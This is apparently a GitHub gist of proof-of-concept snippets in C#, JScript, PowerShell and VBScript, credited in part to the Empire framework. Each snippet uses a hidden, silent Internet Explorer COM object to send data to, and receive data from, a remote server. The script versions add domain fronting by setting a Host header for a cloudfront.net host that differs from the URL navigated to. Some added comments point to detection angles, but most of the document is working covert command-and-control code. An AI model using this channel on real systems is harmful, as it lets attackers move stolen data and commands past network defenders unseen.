@leoloobeek
Last active November 4, 2024 16:36
InternetExplorer.Application PoC's
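// Sample function that takes in a destination server, POST data, and custom HTTP request headers,
// sends the request through a hidden Internet Explorer automation object, and returns the
// outerHTML of the response document's body.
//
// dst           - URL passed to Navigate2.
// postData      - request body; passed to Navigate2 as the PostData argument.
// customHeaders - '|'-separated list of "Name: value" entries; null or "" means no extra headers.
//
// Review notes:
// - InternetExplorer.Application is an out-of-process COM server, so the HTTP request is issued
//   by the Internet Explorer process rather than by the caller. Process-to-network correlation
//   therefore has to account for COM-activated browser instances.
// - Header entries are validated before use: entries without a name/value separator are skipped,
//   and entries containing CR or LF are dropped so a value cannot smuggle additional header lines.
// - The Busy poll has no timeout; a navigation that never completes blocks the caller.
private string SendData(string dst, byte[] postData, string customHeaders)
{
    // CLSID of the InternetExplorer.Application automation object.
    Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
    object IE = Activator.CreateInstance(com_type);
    try
    {
        com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, new object[] { false });
        com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, new object[] { true });

        // 14 = navNoHistory (2) | navNoReadFromCache (4) | navNoWriteToCache (8).
        object flag = 14;
        // Third Navigate2 argument (target frame); kept as the original's placeholder value.
        object empty = 0;
        object pd = postData;

        System.Text.StringBuilder headerText = new System.Text.StringBuilder();
        if (!String.IsNullOrEmpty(customHeaders))
        {
            char[] lineBreaks = new char[] { '\r', '\n' };
            foreach (string header in customHeaders.Split('|'))
            {
                // Split on the FIRST colon only, so values that contain ':' (URLs, host:port)
                // are kept whole instead of being truncated.
                int colon = header.IndexOf(':');
                if (colon <= 0)
                {
                    continue; // no separator or empty name: not a usable header
                }

                string name = header.Substring(0, colon).Trim();
                string value = header.Substring(colon + 1).Trim();
                if (name.Length == 0 || name.IndexOfAny(lineBreaks) >= 0 || value.IndexOfAny(lineBreaks) >= 0)
                {
                    continue; // reject embedded line breaks (header injection)
                }

                headerText.AppendFormat("{0}: {1}\r\n", name, value);
            }
        }
        object headers = headerText.ToString();

        // Navigate2(URL, Flags, TargetFrameName, PostData, Headers)
        object[] oParms = new Object[] { dst, flag, empty, pd, headers };
        com_type.InvokeMember("Navigate2", System.Reflection.BindingFlags.InvokeMethod, null, IE, oParms);

        // Poll until the browser reports that navigation has finished.
        while ((bool)com_type.InvokeMember("Busy", System.Reflection.BindingFlags.GetProperty, null, IE, null))
        {
            System.Threading.Thread.Sleep(100);
        }

        // Walk Document -> body -> outerHTML with late binding.
        object document = com_type.InvokeMember("Document", System.Reflection.BindingFlags.GetProperty, null, IE, null);
        object body = document.GetType().InvokeMember("body", System.Reflection.BindingFlags.GetProperty, null, document, null);
        object content = body.GetType().InvokeMember("outerHTML", System.Reflection.BindingFlags.GetProperty, null, body, null);
        return content.ToString();
    }
    finally
    {
        // Always close the browser instance, including when a call above throws; otherwise a
        // hidden Internet Explorer process is left running.
        try
        {
            com_type.InvokeMember("Quit", System.Reflection.BindingFlags.InvokeMethod, null, IE, null);
        }
        catch (Exception)
        {
            // Best-effort cleanup: do not let a failed Quit mask the original exception.
        }
    }
}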
// JScript (Windows Script Host): requests a URL through a hidden Internet Explorer automation
// object and stores the response body's innerHTML in resp.
// NOTE(review): the request is sent by the Internet Explorer process, not by the script host,
// so detection has to tie the COM-activated browser instance back to the script that created it.
var ie_com = new ActiveXObject("InternetExplorer.Application");
ie_com.Silent = true;   // the object may not display dialog boxes
ie_com.Visible = false; // no browser window is shown
// The Host header names a different host than the URL given to Navigate2 below. Over HTTPS this
// mismatch is only visible to a TLS-inspecting proxy or at the receiving edge.
var headers = "Host: <SNIP>.cloudfront.net\r\n";
// Navigate2(URL, Flags, TargetFrameName, PostData, Headers)
// 14 = navNoHistory (2) | navNoReadFromCache (4) | navNoWriteToCache (8); PostData is null here.
ie_com.Navigate2("https://somedomain.com", 14, 0, null, headers);
// Poll until navigation finishes; there is no timeout, so a stalled request blocks the script.
while(ie_com.Busy) {
WScript.Sleep(1);
// shell = new ActiveXObject("WScript.Shell");shell.Run("ping 127.0.0.1 -n 1", 0, True); <<< if WScript object is unavailable
}
// Read the rendered body markup, then close the browser instance.
var resp = ie_com.document.body.innerHTML
ie_com.Quit();
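# some code taken from ie_com listener at https://github.com/EmpireProject/Empire
# thanks @harmj0y!
#
# Requests a URL through a hidden Internet Explorer automation object and stores the response
# body's InnerHtml in $html.
# NOTE(review): the request is sent by the Internet Explorer process, not by powershell.exe, so
# detection has to tie the COM-activated browser instance back to the session that created it.
$ie_com = New-Object -ComObject InternetExplorer.Application
try {
    $ie_com.Silent = $True    # the object may not display dialog boxes
    $ie_com.Visible = $False  # no browser window is shown
    # The Host header names a different host than the URL given to Navigate2 below. Over HTTPS
    # this mismatch is only visible to a TLS-inspecting proxy or at the receiving edge.
    $Headers = "Host: <SNIP>.cloudfront.net`r`n"
    # Navigate2(URL, Flags, TargetFrameName, PostData, Headers)
    # 14 = navNoHistory (2) | navNoReadFromCache (4) | navNoWriteToCache (8); PostData is $Null here.
    $ie_com.Navigate2("https://somedomain.com", 14, 0, $Null, $Headers)
    # Poll until navigation finishes; there is no timeout, so a stalled request blocks the script.
    while($ie_com.busy -eq $true) {
        Start-Sleep -Milliseconds 100
    }
    # 'body' is read through reflection on the document object instead of direct member access.
    $html = $ie_com.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie_com.document, $Null).InnerHtml
}
finally {
    # The original never closed the browser, leaving a hidden Internet Explorer process behind
    # on every run. Quit here, as the other language variants of this snippet do.
    $ie_com.Quit()
}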
' VBScript (Windows Script Host): requests a URL through a hidden Internet Explorer automation
' object and stores the response body's innerHTML in resp.
' NOTE(review): the request is sent by the Internet Explorer process, not by the script host,
' so detection has to tie the COM-activated browser instance back to the script that created it.
dim ie_com, headers, resp
Set ie_com = CreateObject("InternetExplorer.Application")
' Silent: the object may not display dialog boxes. Visible: no browser window is shown.
ie_com.Silent = true
ie_com.Visible = false
' The Host header names a different host than the URL given to Navigate2 below. Over HTTPS this
' mismatch is only visible to a TLS-inspecting proxy or at the receiving edge.
headers = "Host: <SNIP>.cloudfront.net" & vbCrLf
' Navigate2 URL, Flags, TargetFrameName, PostData, Headers
' 14 = navNoHistory (2) | navNoReadFromCache (4) | navNoWriteToCache (8); PostData is null here.
ie_com.Navigate2 "https://somedomain.com", 14, 0, null, headers
' Poll until navigation finishes; there is no timeout, so a stalled request blocks the script.
While(ie_com.busy)
WScript.Sleep 1
'CreateObject("WScript.Shell").Run "ping 127.0.0.1 -n 1", 0, True <<< if WScript object is unavailable
Wend
' Read the rendered body markup, then close the browser instance.
resp = ie_com.document.body.innerHTML
ie_com.Quit